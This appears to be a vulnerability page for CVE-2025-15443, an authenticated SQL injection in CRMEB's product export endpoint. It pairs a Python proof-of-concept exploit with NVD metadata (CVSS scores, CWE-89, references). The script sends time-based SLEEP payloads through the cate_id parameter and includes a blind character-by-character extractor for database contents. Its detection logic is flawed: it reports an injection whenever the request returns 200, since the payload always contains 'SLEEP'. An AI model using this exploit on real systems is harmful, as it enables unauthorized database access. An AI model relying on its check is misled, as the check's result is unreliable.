CVE-2025-15443

# CVE-2025-15443 SQL Injection PoC # Target: CRMEB <= 5.6.1 # Endpoint: /adminapi/product/product_export # Authentication: High privileges required import requests import json TARGET_URL = "http://target.com/adminapi/product/product_export" # Replace with actual admin token HEADERS = { "Authorization": "Bearer YOUR_ADMIN_TOKEN", "Content-Type": "application/x-www-form-urlencoded" } def sql_injection_test(): """Test for SQL injection in cate_id parameter""" # Basic SQL injection test payload payload = { "cate_id": "1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -", "page": "1", "limit": "10" } print(f"[*] Testing CVE-2025-15443 on {TARGET_URL}") print(f"[*] Payload: {payload}") try: response = requests.post(TARGET_URL, data=payload, headers=HEADERS, timeout=10) if response.status_code == 200: print(f"[+] Response received: {response.text}") # Check for time-based injection response if "SLEEP" in payload.get("cate_id", ""): print("[+] Possible SQL injection detected!") return True except requests.exceptions.Timeout: print("[+] Time-based SQL injection confirmed! Request timed out as expected.") return True except Exception as e: print(f"[-] Error: {e}") return False def blind_sql_extract(): """Extract database version using blind SQL injection""" chars = 'abcdefghijklmnopqrstuvwxyz0123456789@._' result = "" for i in range(1, 50): for char in chars: payload = { "cate_id": f"1' AND SUBSTRING((SELECT VERSION()),{i},1)='{char}'-- -", "page": "1", "limit": "10" } try: response = requests.post(TARGET_URL, data=payload, headers=HEADERS, timeout=5) if response.status_code == 200 and "data" in response.text: result += char print(f"[*] Extracted: {result}") break except: pass return result if __name__ == "__main__": sql_injection_test()

{"cve": {"id": "CVE-2025-15443", "sourceIdentifier": "[email protected]", "published": "2026-01-04T12:15:42.247", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in CRMEB up to 5.6.1. This issue affects some unknown processing of the file /adminapi/product/product_export. Such manipulation of the argument cate_id leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6.1", "matchCriteriaId": "B414DC17-48B1-4FEC-A697-39E37C55439A"}]}]}], "references": [{"url": "https://github.com/En0t5/vul/blob/main/crmeb/crmeb-product-productExport-SQL.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/En0t5/vul/blob/main/crmeb/crmeb-product-productExport-SQL.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339465", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339465", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721916", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}